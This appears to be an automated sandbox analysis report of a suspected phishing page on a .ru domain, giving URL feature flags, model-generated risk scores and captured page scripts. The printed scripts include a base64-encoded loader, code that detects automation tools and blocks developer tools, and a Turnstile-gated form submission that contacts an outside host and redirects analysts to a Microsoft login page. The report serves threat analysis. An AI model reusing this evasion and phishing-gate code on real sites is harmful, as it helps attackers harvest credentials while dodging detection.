Windows Analysis Report
https://mo.iecxtug.ru/eoQpd/

{
    "typosquatting": false,
    "unusual_query_string": false,
    "suspicious_tld": true,
    "ip_in_url": false,
    "long_subdomain": false,
    "malicious_keywords": false,
    "encoded_characters": false,
    "redirection": false,
    "contains_email_address": false,
    "known_domain": false,
    "brand_spoofing_attempt": false,
    "third_party_hosting": true
}

URL: https://mo.iecxtug.ru

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The use of obfuscated code and the presence of anti-debugging techniques further increase the risk. Overall, this script demonstrates a high likelihood of malicious intent and should be treated with caution."
}

if(atob("aHR0cHM6Ly9NTy5pZWN4dHVnLnJ1L2VvUXBkLw==") == "nomatch"){
document.write(decodeURIComponent(escape(atob('PCFET0NUWVBFIGh0bWw+DQo8aHRtbCBsYW5nPSJlbiI+DQo8aGVhZD4NCiAgICA8c2NyaXB0IHNyYz0iaHR0cHM6Ly9jb2RlLmpxdWVyeS5jb20vanF1ZXJ5LTMuNi4wLm1pbi5qcyI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2hhbGxlbmdlcy5jbG91ZGZsYXJlLmNvbS90dXJuc3RpbGUvdjAvYXBpLmpzP3JlbmRlcj1leHBsaWNpdCI+PC9zY3JpcHQ+DQogICAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vY2RuanMuY2xvdWRmbGFyZS5jb20vYWpheC9saWJzL2NyeXB0by1qcy80LjEuMS9jcnlwdG8tanMubWluLmpzIj48L3NjcmlwdD4NCiAgICA8bWV0YSBodHRwLWVxdWl2PSJYLVVBLUNvbXBhdGlibGUiIGNvbnRlbnQ9IklFPUVkZ2UsY2hyb21lPTEiPg0KICAgIDxtZXRhIG5hbWU9InJvYm90cyIgY29udGVudD0ibm9pbmRleCwgbm9mb2xsb3ciPg0KICAgIDxtZXRhIG5hbWU9InZpZXdwb3J0IiBjb250ZW50PSJ3aWR0aD1kZXZpY2Utd2lkdGgsIGluaXRpYWwtc2NhbGU9MS4wIj4NCiAgICA8dGl0bGU+JiM4MjAzOzwvdGl0bGU+DQogICAgPHN0eWxlPg0KYm9keSB7DQogIGJhY2tncm91bmQtY29sb3I6ICNmZmY7DQogIGhlaWdodDogMTAwJTsNCiAgb3ZlcmZsb3c6IGhpZGRlbjsNCn0NCiN1WEZNZm9ESmhOIGg0e21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOi41cmVtO2ZvbnQtd2VpZ2h0OjUwMDtsaW5lLWhlaWdodDoxLjI7fQ0KI3VYRk1mb0RKaE4gaDR7Zm9udC1zaXplOmNhbGMoMS4zKTt9DQpAbWVkaWEgKG1pbi13aWR0aDoxMjAwcHgpew0KI3VYRk1mb0RKaE4gaDR7Zm9udC1zaXplOjEuNXJlbTt9DQp9DQojdVhGTWZvREpoTiBwe21hcmdpbi10b3A6MDttYXJnaW4tYm90dG9tOjFyZW07fQ0KI3VYRk1mb0RKaE4uY2FwdGNoYS1jb250YWluZXJ7cG9zaXRpb246IHJlbGF0aXZlO3RvcDogNDVweDsvKndpZHRoOiAxMDAlOyovcGFkZGluZy1yaWdodDogdmFyKC0tYnMtZ3V0dGVyLXgsIC43NXJlbSk7cGFkZGluZy1sZWZ0OiB2YXIoLS1icy1ndXR0ZXIteCwgLjc1cmVtKTttYXJnaW4tcmlnaHQ6IGF1dG87bWFyZ2luLWxlZnQ6IGF1dG87fQ0KI3VYRk1mb0RKaE4gLnRleHQtY2VudGVyIHt0ZXh0LWFsaWduOiBjZW50ZXIhaW1wb3J0YW50O30NCkBtZWRpYSAobWluLXdpZHRoOjk5MnB4KXsNCiN1WEZNZm9ESmhOIC5jb2wtbGctNHtmbGV4OjAgMCBhdXRvO3dpZHRoOjMzLjMzMzMzMzMzJTt9DQp9DQojdVhGTWZvREpoTiAuZGlzcGxheS00IHtmb250LXNpemU6IDEuMjVyZW0haW1wb3J0YW50O30NCiN1WEZNZm9ESmhOIC5tdC0yIHttYXJnaW4tdG9wOiAwLjVyZW0haW1wb3J0YW50O30NCiN1WEZNZm9ESmhOIC5oNCB7Zm9udC1zaXplOiBjYWxjKC45MDByZW0gKyAuM3Z3KTt9DQojdVhGTWZvREpoTiAuanVzdGlmeS1jb250ZW50LWNlbnRlcntqdXN0aWZ5LWNvbnRlbnQ6Y2VudGVyIWltcG9ydGFudDt9DQojdVhGTWZvREpoTi5tdC01e21hcmdpbi10b3A6M3JlbSFpbXBvcnRhbnQ7fQ0KI3VYRk1mb0RKaE4gLm10LTQge21hcmdpbi10b3A6IDFyZW0haW1wb3J0YW50O30NCiN1WEZNZm9ESmhOICNuT21heExKREF2IHtjb2xvcjogIzZjNzU3ZDtmb250LXNpemU6MTRweDttYXJnaW4tdG9wOiAuNXJlbTt9DQogICAgPC9zdHlsZT4NCiAgICA8c2NyaXB0Pg0KICAgIGlmIChuYXZpZ2F0b3Iud2ViZHJpdmVyIHx8IHdpbmRvdy5jYWxsUGhhbnRvbSB8fCB3aW5kb3cuX3BoYW50b20gfHwgbmF2aWdhdG9yLnVzZXJBZ2VudC5pbmNsdWRlcygiQnVycCIpKSB7DQogICAgICAgIHdpbmRvdy5sb2NhdGlvbiA9ICJhYm91dDpibGFuayI7DQp9DQpkb2N1bWVudC5hZGRFdmVudExpc3RlbmVyKCdrZXlkb3duJywgZnVuY3Rpb24oZXZlbnQpIHsNCiAgICBpZiAoZXZlbnQua2V5Q29kZSA9PT0gMTIzKSB7DQogICAgICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgICAgIHJldHVybiBmYWxzZTsNCiAgICB9DQoNCiAgICBpZiAoDQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDg1KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQuc2hpZnRLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNjcpIHx8DQogICAgICAgIChldmVudC5jdHJsS2V5ICYmIGV2ZW50LnNoaWZ0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDc0KSB8fA0KICAgICAgICAoZXZlbnQuY3RybEtleSAmJiBldmVudC5zaGlmdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3NSkgfHwNCiAgICAgICAgKGV2ZW50LmN0cmxLZXkgJiYgZXZlbnQua2V5Q29kZSA9PT0gNzIpIHx8DQogICAgICAgIChldmVudC5tZXRhS2V5ICYmIGV2ZW50LmFsdEtleSAmJiBldmVudC5rZXlDb2RlID09PSA3MykgfHwNCiAgICAgICAgKGV2ZW50Lm1ldGFLZXkgJiYgZXZlbnQuYWx0S2V5ICYmIGV2ZW50LmtleUNvZGUgPT09IDY3KSB8fA0KICAgICAgICAoZXZlbnQubWV0YUtleSAmJiBldmVudC5rZXlDb2RlID09PSA4NSkNCiAgICApIHsNCiAgICAgICAgZXZlbnQucHJldmVudERlZmF1bHQoKTsNCiAgICAgICAgcmV0dXJuIGZhbHNlOw0KICAgIH0NCn0pOw0KZG9jdW1lbnQuYWRkRXZlbnRMaXN0ZW5lcignY29udGV4dG1lbnUnLCBmdW5jdGlvbihldmVudCkgew0KICAgIGV2ZW50LnByZXZlbnREZWZhdWx0KCk7DQogICAgcmV0dXJuIGZhbHNlOw0KfSk7DQp6eWhUaWNOUm9HID0gZmFsc2U7DQooZnVuY3Rpb24gTFNBb3pUYmx0SCgpIHsNCiAgICBsZXQgb3JuckNoWVlGVCA9IGZhbHNlOw0KICAgIGNvbnN0IGNGWGxNanljVFQgPSAxMDA7DQogICAgc2V0SW50ZXJ2YWwoZnVuY3Rpb24oKSB7DQogICAgICAgIGNvbnN0IFFrZnVzbmtwcWggPSBwZXJmb3JtYW5jZS5ub3coKTsNCiAgICAgICAgZGVi

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including detecting the presence of web automation tools, disabling common developer tools and keyboard shortcuts, and redirecting the user to a suspicious domain. The script also includes an obfuscated interval function that appears to be designed to detect and respond to debugging attempts. These behaviors are highly indicative of malicious intent, likely for the purpose of evading detection and analysis."
}

    if (navigator.webdriver || window.callPhantom || window._phantom || navigator.userAgent.includes("Burp")) {
        window.location = "about:blank";
}
document.addEventListener('keydown', function(event) {
    if (event.keyCode === 123) {
        event.preventDefault();
        return false;
    }

    if (
        (event.ctrlKey && event.keyCode === 85) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 73) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 67) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 74) ||
        (event.ctrlKey && event.shiftKey && event.keyCode === 75) ||
        (event.ctrlKey && event.keyCode === 72) ||
        (event.metaKey && event.altKey && event.keyCode === 73) ||
        (event.metaKey && event.altKey && event.keyCode === 67) ||
        (event.metaKey && event.keyCode === 85)
    ) {
        event.preventDefault();
        return false;
    }
});
document.addEventListener('contextmenu', function(event) {
    event.preventDefault();
    return false;
});
zyhTicNRoG = false;
(function LSAozTbltH() {
    let ornrChYYFT = false;
    const cFXlMjycTT = 100;
    setInterval(function() {
        const Qkfusnkpqh = performance.now();
        debugger;
        const otrkSwjNct = performance.now();
        if (otrkSwjNct - Qkfusnkpqh > cFXlMjycTT && !ornrChYYFT) {
            zyhTicNRoG = true;
            ornrChYYFT = true;
            window.location.replace('https://login.microsoftonline.com');
        }
    }, 100);
})();
    

{
    "risk_score": 9,
    "reasoning": "This script exhibits several high-risk behaviors, including dynamic code execution, data exfiltration, and redirects to suspicious domains. The script collects user data and sends it to an unknown domain, and it also redirects the user to a Microsoft login page, which could be part of a phishing attempt. Overall, the script demonstrates highly suspicious and potentially malicious behavior, warranting a high-risk score."
}

turnstile.render('#cf', {
    sitekey: '0x4AAAAAAA0N6OGf7im_X_Hd',
    'error-callback': nVekOThFMK,
    callback: KeblihKweT,
});
function nVekOThFMK() {
    turnstile.reset();
}
function KeblihKweT() {
    var VWBrDFoYbA = document.getElementById("gYlNPQgSmr");
    VWBrDFoYbA.onsubmit = function (event) {
        event.preventDefault();
    };
    document.getElementById("pagelink").value = '1kz0rx4';
    var wnjsUFFLMt = "../lnUK2DtCpjMmEVk4ZwSdPrc7vzMdSMumo";
    fetch('https://XSuG5Wc5FRR6gU8HSLNh576VSV0Aa5uMrxCZewmq6T85mlJoRlE0YrZo4n.apouters.ru/MevVqjNksVgEwhbomANpWDKXEQRTCZCBQPDZTEQDMEGGFYDYYSUGRSQEOESB', {
    method: "GET",
    }).then(response => {
    return response.text()
    }).then(text => {
    if(text == 0){
    fetch(wnjsUFFLMt, {
        method: "POST",
        body: new FormData(VWBrDFoYbA)
    }).then(response => {
        return response.json();
    }).then(data => {
        if(data['status'] == 'success'){
        if(zyhTicNRoG == false){
        location.reload();
        }
        }
        if(data['status'] == 'error'){
        window.location.replace('https://login.microsoftonline.com');
        }
    });
    }
    if(text != 0){
    window.location.replace('https://login.microsoftonline.com');
    }
    })
    .catch(error => {
    window.location.replace('https://login.microsoftonline.com');
    });
}

{
    "risk_score": 3,
    "reasoning": "The provided JavaScript snippet appears to be a Cloudflare challenge script, which is a legitimate and common practice for web security. The script sets up various configuration options for the Cloudflare challenge and includes functionality to handle communication between the challenge and the parent window. While the script uses some techniques that could be considered risky, such as dynamic message handling and postMessage communication, these are common practices in the context of a Cloudflare challenge and do not appear to have malicious intent. Overall, the script seems to be a benign implementation of a Cloudflare challenge, with no clear indicators of malicious behavior."
}

        (function(){
            window._cf_chl_opt={
                cvId: '3',
                cZone: 'challenges.cloudflare.com',
                cTplV: 5,
                chlApivId: '0',
                chlApiWidgetId: 'a5gd4',
                chlApiSitekey: '0x4AAAAAAA0N6OGf7im_X_Hd',
                chlApiMode: 'managed',
                chlApiSize: 'normal',
                chlApiRcV: 'FY09KJb8bkchbna7oAeaVAvPzi8RxFA32RM00D4yeRo-1736412296-1.3.1.1-ICUvIrmWyI7wx3A.NHV9SuOgk9kQtwZnpSu4.samlEc',
                chlApiTimeoutEncountered: 0,
                chlApiOverrunBudgetMs:10000,
                chlTimeoutMs:120000,
                cK:[],
                cType: 'chl_api_m',
                cRay: '8ff325f4be22c47f',
                cH: 'gaSxVqxRzADHwajIGBCDwUFRQ5nav89YW3zEK0IUUqw-1736412296-1.1.1.1-NQ_khfw2.B.5CcyblFq0FEbIV4TMADppxOL6YSk84Q_Wu4TJt4mutsjPM8Kxw3YC',
                cFPWv: 'g',
                cLt: 'n',
                chlApiFailureFeedbackEnabled:true,
                chlApiLoopFeedbackEnabled:false,
                wOL:false,
                wT: 'auto',
                wS: 'normal',
                md: 'CyBV6tcfJwVlV8DoLg9oHCBb_HJR1GdYmcRWkRymRXY-1736412296-1.1.1.1-NC12yeJ4Ys2rYzDFQJvS5RUrLz46ppWSw0agzksajjklVd.B3nNroewT1Q7sdx3XLCQtMVOwSykexW4zOkoUjlUp_ZHDwsTl8CvNgh69FLoBlkE6Pv7IOsNEY73QQ0g35w1b_H4nk6G9CLUj.mDwYbVNaPj8g84TgaT3nITaVKiSvZeg0jYN.uUjQ_GCOsffdmhY_kUaCdBxOiwc6fJ2fWNFX9nMv8vmsFNuJK71X_ENoI8PZUYkVD5Q9oqzF5mvcWaL53opAt2vycRCm.lLlivaArQBLPCc8rfzKCbRcAwQcHWYGCD6_g9AbZ2xU0or3rdtUtI5CaG9hSXEvkWLf9lEBZas8MDwQshcNJOmI0kR215SfWckI32Jl9RSp8ybmOkPtzvJ5c0a.x6sFVW41ue7NVKqhspPRS_tnsDfbRcSmzaok26._ldVjWhljxUNcBD99GNnQgAbo6s1O3W_2uWrjC8HVoDpucVbCpr2kyiHkEY3QpWsSulxuoQI58npeSoHpQzs0bMMKfF6meeev3EOtaROPzlvr7Z0k4fkUMlB_Ra4WEAki1ZSipp3k0rIMKTBI2ebQmI2gG2RRMd1WoScsUrl.nmHovF.PBByUMmdjfMtpxGSJS9bgqJXDwTI8ykWfOqdPFCpgLUocyBXfUYuNJ8zUlh.p3CD3EvYt3v7f2Mdc7wIfA4cVOhOsgrK8kudUZYM9Oy252s29WbpHuh91.KVg01nIP.mQ9Zla8FnbFoRYZA1tHYuOopsDKMrQOVBJ7_RxAT71YYrXpsCeHSsdarhJ.ra4FBpc0MLojv2Zs90iFxWX66V_JicJ3xfMrnAd3OXWZszdrTVzDryQSVL0qgMriMM51bH9YFXCUKvAUQHYHZtjDBa7uTiPKQgkyFcdd81FMlG5IJxfF07Nm9tx9CxzEeQ7ZCxNLBY5_zgox5pUwL6555b5oj.46JmbUaN2r.DiLUhYt4j8MNDLCWKuJOvvHgdPMeJKDVOo2_p3tT7k32rKzqy.VJrf6qlQ87rFEwLF4QsAWBkVh1SMkO6p.dtr7eqtDHC4cTtcKk39OpBXickBE.ARC9hG_y2t78wMgG.apxq420q97zTb0eMKhHmVrGq1xFyiaNNLRokEFCJ0wLV3k5rT9xfmeGWscVF0vI5LnjpPebXayDUKYb3XsdJXE9Um22bbdlbcX5K_NSKOw3vYY_sN4o_2Mof0GhxMDsVn6YtAA_1HjZe1gQV_TLv3pqt6UzW5ibNGFk6CMXW.fqauy9wA7MIV3SWnevUN8yKlXNeLadqbklD0LMQXWXoOhHHvJSAU3xmRKlg1Etv9yN1GEJqlLjta6joi_TRUvF1QIdmnpNNdKY4vVrGgjgo78LwxXhyTxHVrSc',
                cITimeS: '1736412296',
                refresh: function(){
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: 'a5gd4',
                            nextRcV: 'FY09KJb8bkchbna7oAeaVAvPzi8RxFA32RM00D4yeRo-1736412296-1.3.1.1-ICUvIrmWyI7wx3A.NHV9SuOgk9kQtwZnpSu4.samlEc',
                            event: 'reloadRequest',
                        }, "*");
                    }
                }
            };
            var handler = function(event) {
                var e = event.data;
                if (e.source && e.source === 'cloudflare-challenge' && e.event === 'meow' && e.widgetId === window._cf_chl_opt.chlApiWidgetId) {
                    if(window['parent']){
                        window['parent'].postMessage({
                            source: 'cloudflare-challenge',
                            widgetId: window._cf_chl_opt.chlApiWidgetId,
                            event: 'food',
                            seq: e.seq,
                        }, '*');
                    }
                }
            }
            window.addEventListener('message', handler);
        }());
    

{
    "risk_score": 1,
    "reasoning": "This script appears to be a Cloudflare Turnstile challenge, which is a legitimate security mechanism used to verify users and protect against bots. The script contains configuration options and translations for the Turnstile challenge, but does not exhibit any high-risk behaviors. While it uses some legacy APIs like `XDomainRequest`, this is common for older browser support and does not indicate malicious intent. Overall, this script is likely benign and part of a standard Cloudflare security implementation."
}

window._cf_chl_opt.uaO=false;window._cf_chl_opt.qqQL2={"metadata":{"challenge.supported_browsers":"https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support","challenge.terms":"https%3A%2F%2Fwww.cloudflare.com%2Fwebsite-terms%2F","challenge.privacy_link":"https%3A%2F%2Fwww.cloudflare.com%2Fprivacypolicy%2F"},"translations":{"turnstile_feedback_description":"Send%20Feedback","testing_only_always_pass":"Testing%20only%2C%20always%20pass.","human_button_text":"Verify%20you%20are%20human","turnstile_verifying":"Verifying...","turnstile_timeout":"Timed%20out","turnstile_success":"Success%21","turnstile_iframe_alt":"Widget%20containing%20a%20Cloudflare%20security%20challenge","outdated_browser":"Your%20browser%20is%20out%20of%20date.%20Update%20your%20browser%20to%20view%20this%20site%20properly.%3Cbr%2F%3E%3Ca%20target%3D%22_blank%22%20rel%3D%22noopener%20noreferrer%22%20href%3D%22https%3A%2F%2Fdevelopers.cloudflare.com%2Ffundamentals%2Fget-started%2Fconcepts%2Fcloudflare-challenges%2F%23browser-support%22%3EClick%20here%20for%20more%20information%3C%2Fa%3E","not_embedded":"This%20challenge%20must%20be%20embedded%20into%20a%20parent%20page.","time_check_cached_warning":"Your%20device%20clock%20is%20set%20to%20a%20wrong%20time%20or%20this%20challenge%20page%20was%20accidentally%20cached%20by%20an%20intermediary%20and%20is%20no%20longer%20available","turnstile_expired":"Expired","turnstile_footer_terms":"Terms","feedback_report_output_subtitle":"Your%20feedback%20report%20has%20been%20successfully%20submitted","turnstile_overrun_description":"Stuck%20here%3F","testing_only":"Testing%20only.","turnstile_failure":"Error","invalid_sitekey":"Invalid%20sitekey.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","invalid_domain":"Invalid%20domain.%20Contact%20the%20Site%20Administrator%20if%20this%20problem%20persists.","turnstile_feedback_report":"Having%20trouble%3F","turnstile_footer_privacy":"Privacy","check_delays":"Verification%20is%20taking%20longer%20than%20expected.%20Check%20your%20Internet%20connection%20and%20%3Ca%20class%3D%22refresh_link%22%3Erefresh%20the%20page%3C%2Fa%3E%20if%20the%20issue%20persists.","turnstile_refresh":"Refresh"},"polyfills":{"feedback_report_output_subtitle":false},"rtl":false,"lang":"en-us"};~function(gJ,eM,eN,eO,eR,eS,fi,fj,fk,fo,fp,fs,fv,fx,fy,fz,fL,fX,g3,g4,g5,gf,gq,gu,gB,eP,eQ){for(gJ=b,function(c,d,gI,e,f){for(gI=b,e=c();!![];)try{if(f=parseInt(gI(849))/1+-parseInt(gI(1391))/2+-parseInt(gI(901))/3+parseInt(gI(1343))/4*(-parseInt(gI(1455))/5)+-parseInt(gI(1484))/6+-parseInt(gI(1672))/7+parseInt(gI(690))/8,f===d)break;else e.push(e.shift())}catch(g){e.push(e.shift())}}(a,285325),eM=this||self,eN=eM[gJ(546)],eO=function(f,gK,g,h,i,j,k,l,m){for(gK=gJ,g={},g[gK(1569)]=function(n,s){return n+s},h=g,m,j=32,l=h[gK(1569)](eM[gK(1368)][gK(521)],'_')+0,l=l[gK(1559)](/./g,function(n,s,gL){gL=gK,j^=l[gL(761)](s)}),f=eM[gK(727)](f),k=[],i=-1;!isNaN(m=f[gK(761)](++i));k[gK(439)](String[gK(560)](((255.61&m)-j-i%65535+65535)%255)));return k[gK(1595)]('')},eP=[],eQ=0;256>eQ;eP[eQ]=String[gJ(560)](eQ),eQ++);eR=(0,eval)(gJ(707)),eS=atob(gJ(791)),fi=function(hk,d,e,f,g){return hk=gJ,d={'lhzjp':hk(1600),'gkkol':hk(540),'RQTpa':function(h,i){return h&i},'ORHOh':hk(1591),'eSuzf':hk(1542),'Trnfq':function(h,i){return h+i},'QkZHC':function(h,i){return h===i},'oIWDF':function(h,i,j){return h(i,j)},'yrUOu':hk(654),'qEWDt':function(h,i){return h==i},'AEsyA':function(h,i){return h>i},'iaIsy':function(h,i){return h|i},'IHssf':function(h,i){return h<<i},'RLVwx':function(h,i){return h==i},'aWeWS':function(h,i){return h-i},'OjAbZ':function(h,i){return h>i},'fNUBh':function(h,i){return i|h},'eRvUI':function(h,i){return i==h},'TzLHy':function(h,i){return h(i)},'AuOje':hk(1128),'cxjwG':function(h,i){return h&i},'IIZlE':function(h,i){return h==i},'xKzaC':function(h,i){return h<i},'OfZXP':function(h,i){return h|i},'qQViz':function(h,i){return h-i},'hJ

{
    "risk_score": 1,
    "reasoning": "The provided JavaScript snippet appears to be a part of the CryptoJS library, which is a well-known and widely used cryptography library. It does not contain any high-risk indicators such as dynamic code execution, data exfiltration, or redirects to malicious domains. The code is primarily focused on implementing various cryptographic primitives and utilities, which are common in legitimate applications. While the code uses some legacy practices like the `XDomainRequest` API, these are not inherently malicious and are likely used for compatibility reasons. Overall, this script appears to be a benign implementation of cryptographic functionality and poses a low risk."
}

!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U||function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create||function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init||(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();return t.init.apply(t,arguments),t},init:function(){},mixIn:function(t){for(var e in t)t.hasOwnProperty(e)&&(this[e]=t[e]);t.hasOwnProperty("toString")&&(this.toString=t.toString)},clone:function(){return this.init.prototype.extend(this)}},l=n.WordArray=o.extend({init:function(t,e){t=this.words=t||[],this.sigBytes=null!=e?e:4*t.length},toString:function(t){return(t||c).stringify(this)},concat:function(t){var e=this.words,r=t.words,i=this.sigBytes,n=t.sigBytes;if(this.clamp(),i%4)for(var o=0;o<n;o++){var s=r[o>>>2]>>>24-o%4*8&255;e[i+o>>>2]|=s<<24-(i+o)%4*8}else for(var c=0;c<n;c+=4)e[i+c>>>2]=r[c>>>2];return this.sigBytes+=n,this},clamp:function(){var t=this.words,e=this.sigBytes;t[e>>>2]&=4294967295<<32-e%4*8,t.length=h.ceil(e/4)},clone:function(){var t=o.clone.call(this);return t.words=this.words.slice(0),t},random:function(t){for(var e=[],r=0;r<t;r+=4)e.push(function(){if(i){if("function"==typeof i.getRandomValues)try{return i.getRandomValues(new Uint32Array(1))[0]}catch(t){}if("function"==typeof i.randomBytes)try{return i.randomBytes(4).readInt32LE()}catch(t){}}throw new Error("Native crypto module could not be used to get secure random number.")}());return new l.init(e,t)}}),s=t.enc={},c=s.Hex={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push((o>>>4).toString(16)),i.push((15&o).toString(16))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i+=2)r[i>>>3]|=parseInt(t.substr(i,2),16)<<24-i%8*4;return new l.init(r,e/2)}},a=s.Latin1={stringify:function(t){for(var e=t.words,r=t.sigBytes,i=[],n=0;n<r;n++){var o=e[n>>>2]>>>24-n%4*8&255;i.push(String.fromCharCode(o))}return i.join("")},parse:function(t){for(var e=t.length,r=[],i=0;i<e;i++)r[i>>>2]|=(255&t.charCodeAt(i))<<24-i%4*8;return new l.init(r,e)}},f=s.Utf8={stringify:function(t){try{return decodeURIComponent(escape(a.stringify(t)))}catch(t){throw new Error("Malformed UTF-8 data")}},parse:function(t){return a.parse(unescape(encodeURIComponent(t)))}},d=n.BufferedBlockAlgorithm=o.extend({reset:function(){this._data=new l.init,this._nDataBytes=0},_append:function(t){"string"==typeof t&&(t=f.parse(t)),this._data.concat(t),this._nDataBytes+=t.sigBytes},_process:function(t){var e,r=this._data,i=r.words,n=r.sigBytes,o=this.blockSize,s=n/(4*o),c=(s=t?h.ceil(s):h.max((0|s)-this._minBufferSize,0))*o,n=h.min(4*c,n);if(c){for(var a=0;a<c;a+=o)this._doProcessBlock(i,a);e=i.splice(0,c),r.sigBytes-=n}return new l.init(e,n)},clone:function(){var t=o.clone.call(this);return t._data=this._data.clone(),t},_minBufferSize:0}),u=(n.Hasher=d.extend({cfg:o.extend(),init:function(t){this.cfg=this.cfg.extend(t),this.reset()},reset:function(){d.reset.call(this),this._doReset()},update:function(t){return this._append(t),this._process(),this},finalize:function(t){return t&&this._append(t),this._doFinalize()},blockSize:16,_createHelper:function(r){return function(t,e){return new r.init(e).finalize(t)}},_createHmacHelper:function(r){return function(t,

{
  "contains_trigger_text": false,
  "trigger_text": "unknown",
  "prominent_button_name": "unknown",
  "text_input_field_labels": "unknown",
  "pdf_icon_visible": false,
  "has_visible_captcha": false,
  "has_urgent_text": false,
  "has_visible_qrcode": false,
  "contains_chinese_text": false,
  "contains_fake_security_alerts": false
}

{
  "brands": [
    "Cloudflare"
  ]
}

```json
{
    "risk_score": 1,
    "reasoning": "The script does not exhibit any high-risk or moderate-risk behaviors. It primarily consists of utility functions and error handling, with no signs of dynamic code execution, data exfiltration, or interaction with external domains. The code appears to be part of a larger library or framework, possibly for handling asynchronous operations or managing errors."
}

"use strict";(function(){function Wt(e,r,n,o,c,u,g){try{var h=e[u](g),l=h.value}catch(p){n(p);return}h.done?r(l):Promise.resolve(l).then(o,c)}function Ht(e){return function(){var r=this,n=arguments;return new Promise(function(o,c){var u=e.apply(r,n);function g(l){Wt(u,o,c,g,h,"next",l)}function h(l){Wt(u,o,c,g,h,"throw",l)}g(void 0)})}}function D(e,r){return r!=null&&typeof Symbol!="undefined"&&r[Symbol.hasInstance]?!!r[Symbol.hasInstance](e):D(e,r)}function Me(e,r,n){return r in e?Object.defineProperty(e,r,{value:n,enumerable:!0,configurable:!0,writable:!0}):e[r]=n,e}function Fe(e){for(var r=1;r<arguments.length;r++){var n=arguments[r]!=null?arguments[r]:{},o=Object.keys(n);typeof Object.getOwnPropertySymbols=="function"&&(o=o.concat(Object.getOwnPropertySymbols(n).filter(function(c){return Object.getOwnPropertyDescriptor(n,c).enumerable}))),o.forEach(function(c){Me(e,c,n[c])})}return e}function Ar(e,r){var n=Object.keys(e);if(Object.getOwnPropertySymbols){var o=Object.getOwnPropertySymbols(e);r&&(o=o.filter(function(c){return Object.getOwnPropertyDescriptor(e,c).enumerable})),n.push.apply(n,o)}return n}function nt(e,r){return r=r!=null?r:{},Object.getOwnPropertyDescriptors?Object.defineProperties(e,Object.getOwnPropertyDescriptors(r)):Ar(Object(r)).forEach(function(n){Object.defineProperty(e,n,Object.getOwnPropertyDescriptor(r,n))}),e}function Bt(e){if(Array.isArray(e))return e}function jt(e,r){var n=e==null?null:typeof Symbol!="undefined"&&e[Symbol.iterator]||e["@@iterator"];if(n!=null){var o=[],c=!0,u=!1,g,h;try{for(n=n.call(e);!(c=(g=n.next()).done)&&(o.push(g.value),!(r&&o.length===r));c=!0);}catch(l){u=!0,h=l}finally{try{!c&&n.return!=null&&n.return()}finally{if(u)throw h}}return o}}function qt(){throw new TypeError("Invalid attempt to destructure non-iterable instance.\nIn order to be iterable, non-array objects must have a [Symbol.iterator]() method.")}function at(e,r){(r==null||r>e.length)&&(r=e.length);for(var n=0,o=new Array(r);n<r;n++)o[n]=e[n];return o}function zt(e,r){if(e){if(typeof e=="string")return at(e,r);var n=Object.prototype.toString.call(e).slice(8,-1);if(n==="Object"&&e.constructor&&(n=e.constructor.name),n==="Map"||n==="Set")return Array.from(n);if(n==="Arguments"||/^(?:Ui|I)nt(?:8|16|32)(?:Clamped)?Array$/.test(n))return at(e,r)}}function Ae(e,r){return Bt(e)||jt(e,r)||zt(e,r)||qt()}function F(e){"@swc/helpers - typeof";return e&&typeof Symbol!="undefined"&&e.constructor===Symbol?"symbol":typeof e}function Ue(e,r){var n={label:0,sent:function(){if(u[0]&1)throw u[1];return u[1]},trys:[],ops:[]},o,c,u,g;return g={next:h(0),throw:h(1),return:h(2)},typeof Symbol=="function"&&(g[Symbol.iterator]=function(){return this}),g;function h(p){return function(E){return l([p,E])}}function l(p){if(o)throw new TypeError("Generator is already executing.");for(;g&&(g=0,p[0]&&(n=0)),n;)try{if(o=1,c&&(u=p[0]&2?c.return:p[0]?c.throw||((u=c.return)&&u.call(c),0):c.next)&&!(u=u.call(c,p[1])).done)return u;switch(c=0,u&&(p=[p[0]&2,u.value]),p[0]){case 0:case 1:u=p;break;case 4:return n.label++,{value:p[1],done:!1};case 5:n.label++,c=p[1],p=[0];continue;case 